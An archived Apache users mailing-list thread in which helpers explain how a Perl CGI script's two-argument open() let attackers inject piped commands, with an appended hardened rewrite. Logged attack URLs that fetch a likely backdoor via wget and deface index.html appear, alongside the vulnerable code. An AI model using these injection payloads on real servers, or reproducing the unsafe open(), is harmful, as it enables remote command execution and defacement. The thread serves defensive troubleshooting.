httpd-users mailing list archives

From Murthy Ambaru <bobby...@yahoo.com>
Subject Re: [users@httpd] Security Problem
Date Sun, 05 Dec 2004 21:31:49 GMT
Thanks Dick and Ivan for the input....Well, the programmer who worked on this is no longer here.
So would it be sufficient if I just check in the parseForm if the input file has any kind
of weird characters (such as %, |, wget etc.) and if it does, redirect it somewhere else?
Or should I check if the file exists in the system? I thought of doing this initially, but
I could not reproduce what the hacker did by using the same command. I wanted to reproduce
it and then correct the script and retest it again so as to be sure that it is fixed.
Also, this is not in Linux (it's Windows), so what should I do to check that the system is
not already compromised....thanks a lot

"Ivan Barrera A." <Bruce@Ivn.cl> wrote:
As I see, you take the parameter file from the URL without parsing it 
(as Dick explained in another post too)

my $data_file =
"/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
if (!open(FILE,"$data_file")) { die "Can't open";}

You are not checking if the file is really valid, and are passing 
additional cmds without even noticing. (the pipe is really dangerous)

As Dick said... ask your programmer to fix this right up. (and try to 
examine your machine.. it may be already compromised.. if in redhat run 
rpm -VVV procps net-tools util-linux rpm , if nothing comes up, you're good)



Murthy Ambaru wrote:
> Thanks for the explanation. So the file can be downloaded to /tmp/bind 
> directory in the server executing that script. As I said, I tried typing 
> in the URL used and got nothing. I did not check the /tmp/bind though (I 
> did not find that in the interface that I use to manage files on the 
> server). So what would be a secure way of opening the file?
> The script is in PERL. I am adding it below. Can you see anything weird 
> in it?? Thanks...
> 
> #!/usr/local/bin/perl
> print "Content-type: text/html\n\n";
> &parseForm;
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
> my $data_file = 
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = <FILE>;
> close(FILE);
> $print = 1 ;
> foreach $line(@FILE) {
> if ($line =~ /beginimage/) {
> print $line ;
> $print = 0;
> next ;
> }
> if ($line =~ /endimage/) { $print = 1 ; }
> if ($print eq "1") {
> print $line;
> }
> }
> 
> ########################################################
> sub parseForm {
> if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> # Split the name-value pairs
> @pairs = split(/&/, $ENV{'QUERY_STRING'});
> }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> 
> read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> # Split the name-value pairs
> @pairs = split(/&/, $buffer);
> }
> foreach $pair (@pairs) {
> ($name, $value) = split(/=/, $pair);
> # Un-Webify plus signs and %-encoding
> $value =~ tr/+/ /;
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> $FORM{$name} = $value;
> }
> }
> 
> 
> "Ivan Barrera A." wrote:
> 
> I mean, the cgi script (which I don't know anything about) seems to
> "open" a file referred by ?file= ... Probably an insecure way of "opening"
> the file leads to executing the rest of the statement.
> 
> Look :
> 
> ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
> 
> After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind
> is appended. So, if the script executes this, the command wget will
> exec, and download that file into /tmp/bind.
> After that, using the same technique, you can exec anything you want. So
> the problem is the way of opening (or doing something else to) the
> files in the cgi script.
> Is it a C, Perl, PHP, or any other language script?
> 
> Murthy Ambaru wrote:
> > Thanks for the response Ivan. I am sorry I really did not understand what
> > you mean by "download the file to /tmp/bind". When the printer friendly
> > link is clicked, this is the URL that will be accessed:
> > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> > Of course it depends on the page being clicked at. So the file name will
> > be passed as parameter to the CGI file. I included the CGI code in my
> > earlier mail, could you please take a look.
> > Thanks,
> > Murthy
> >
> > "Ivan Barrera A." wrote:
> >
> > the url you entered downloads the file bind to /tmp/bind . It's
> > probably an irc bot or a backdoor.
> > If someone did that, the version of the cgi script is insecure, and
> > should be revised.
> >
> > I'm sorry if I didn't clarify enough, but it would be useful to see
> > that cgi.
> >
> > Murthy Ambaru wrote:
> > > I have a question regarding security. There is a web site that has a
> > > printer friendly version of web pages being displayed using a CGI
> > > script. Apparently when this was in use, the site was hacked and some
> > > unwanted stuff posted on the site. I had a look at the access.log when
> > > this occurred and this was what showed up (I just replaced the site name
> > > with xyz, everything else is same):
> > >
> > > /images/newswireprint.gif HTTP/1.0" 304 - "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
> > >
> > > GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/vhosts/xyz.org/httpdocs/index.html|
> > >
> > > Can anyone understand how they are able to hack? I tried reproducing it
> > > by typing in the above URL used by hackers, but could get nothing out of
> > > it. The permissions on all the html docs folders are set to 755.
> > >
> > > Below is the CGI file being used. It basically strips images off. Can
> > > anyone help with this problem? What should I be looking at to plug off
> > > the security holes....Thanks a lot
> > >
> > > -Murthy
> > >
> > >
> > >
> > > #!/usr/local/bin/perl
> > >
> > > print "Content-type: text/html\n\n";
> > >
> > > &parseForm;
> > >
> > > open(HEADER,"printheader.html") ;
> > > my @HEADER = <HEADER>;
> > > close(HEADER);
> > > #print it! Put a # before print if you don't want a header printed...
> > > print "@HEADER";
> > >
> > > my $data_file =
> > > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> > >
> > > if (!open(FILE,"$data_file")) { die "Can't open";}
> > > my @FILE = <FILE>;
> > > close(FILE);
> > >
> > > $print = 1 ;
> > >
> > > foreach $line(@FILE) {
> > >
> > > if ($line =~ /beginimage/) {
> > > print $line ;
> > > $print = 0;
> > > next ;
> > > }
> > >
> > > if ($line =~ /endimage/) { $print = 1 ; }
> > >
> > > if ($print eq "1") {
> > > print $line;
> > > }
> > >
> > > }
> > >
> > >
> > > ########################################################
> > >
> > > sub parseForm {
> > >
> > > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > > }
> > > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> > >
> > >
> > > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> > >
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $buffer);
> > > }
> > > foreach $pair (@pairs) {
> > > ($name, $value) = split(/=/, $pair);
> > >
> > > # Un-Webify plus signs and %-encoding
> > > $value =~ tr/+/ /;
> > > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> > >
> > > $FORM{$name} = $value;
> > > }
> > >
> > > }
> > >
> > >
> > >
> > >
> > >
> >
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
> > Project.
> > See for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > " from the digest: users-digest-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
> >
> 
> 
> 



		
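For readers of this thread, here is an added example (not the script posted above, and not code from the list or from any Apache project) showing the file read done the way Ivan's and Dick's advice implies. The root cause the thread identifies is Perl's two-argument open(): the mode is taken from the string, so a trailing "|" turns the file name into a command pipeline. Checking for a few "weird characters" is a deny-list and misses whatever is not on it; the example instead allow-lists the name, confirms the resolved path stays under the script's directory, and uses three-argument open() with an explicit read mode. The $BASE directory is the one the posted script uses; the sub names, the regex and the sample inputs are this example's own assumptions.

```perl
#!/usr/local/bin/perl
# Added example, not the thread's script: the two-argument open() that the
# thread identifies beside a hardened read of the same "file" parameter.
# $BASE is the directory the posted script uses; the sub names and the sample
# inputs are this example's own.
use strict;
use warnings;
use Cwd qw(realpath);

my $BASE = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles";

# As posted: with two arguments, open() takes the mode from the string itself.
# A value that ends in "|" is therefore run as a command pipeline, which is how
# "file=/2004/0722-08.htm|wget ...|" executed wget instead of reading a file.
sub read_file_vulnerable {
    my ($form_file) = @_;
    my $data_file = "$BASE/$form_file";
    open(FILE, "$data_file") or die "Can't open";   # mode decided by the data
    my @lines = <FILE>;
    close(FILE);
    return @lines;
}

# Step 1: allow-list the name. Each "/"-separated segment must start with
# [A-Za-z0-9_-] and may then contain dots, so ".." can never be a segment, and
# "|", ";", "%", spaces and friends are simply not in the alphabet. Returns the
# normalised relative name, or nothing if the value is rejected.
sub valid_name {
    my ($form_file) = @_;
    return unless defined $form_file;
    (my $rel = $form_file) =~ s{^/+}{};          # the script prepends $BASE itself
    return unless $rel =~ m{^(?:[A-Za-z0-9_-][A-Za-z0-9._-]*/)*
                             [A-Za-z0-9_-][A-Za-z0-9._-]*\.html?$}x;
    return if grep { $_ eq '..' } split m{/}, $rel;   # redundant with the regex, kept as a guard
    return $rel;
}

# Step 2: resolve the path and confirm it is still inside $BASE, so a symlink
# under scriptfiles cannot lead elsewhere. realpath() returns undef when the
# file does not exist. (Prefix check written for the "/"-separated layout in
# the thread; on Windows compare through File::Spec instead.)
sub safe_path {
    my ($form_file) = @_;
    my $rel = valid_name($form_file);
    return unless defined $rel;
    my $real      = realpath("$BASE/$rel");
    my $real_base = realpath($BASE);
    return unless defined $real && defined $real_base;
    return unless index($real, "$real_base/") == 0;
    return $real;
}

# Step 3: three-argument open with an explicit "<". Even if a bad name slipped
# through, open() would now only ever try to read a file of that name.
sub read_file_safe {
    my ($form_file) = @_;
    my $path = safe_path($form_file);
    die "Refusing to open: invalid file parameter\n" unless defined $path;
    open(my $fh, '<', $path) or die "Can't open $path: $!\n";
    my @lines = <$fh>;
    close($fh);
    return @lines;
}

# Constructed inputs: the legitimate value and the two values from the
# thread's access.log, as they look after parseForm has %XX-decoded them,
# plus a traversal attempt. Only the first passes valid_name().
my @inputs = (
    '/2004/0722-08.htm',
    '/2004/0722-08.htm|wget http://64.58.72.242/bind -O/tmp/bind|',
    '|echo innocent boys... > /data/httpd/vhosts/xyz.org/httpdocs/index.html|',
    '../../index.html',
);
for my $in (@inputs) {
    printf "%-8s %s\n", (defined valid_name($in) ? 'accepted' : 'rejected'), $in;
}
```

Run as-is it only exercises valid_name(), since the files in $BASE do not exist on a test box; read_file_safe() is what replaces the posted `open(FILE,"$data_file")` line. The order of the three steps matters: the allow-list stops the logged payloads before any filesystem call, the realpath() prefix check covers symlinks and anything the regex might one day be loosened to admit, and the explicit "<" mode removes the pipe behaviour entirely, so the script no longer depends on the validation being perfect.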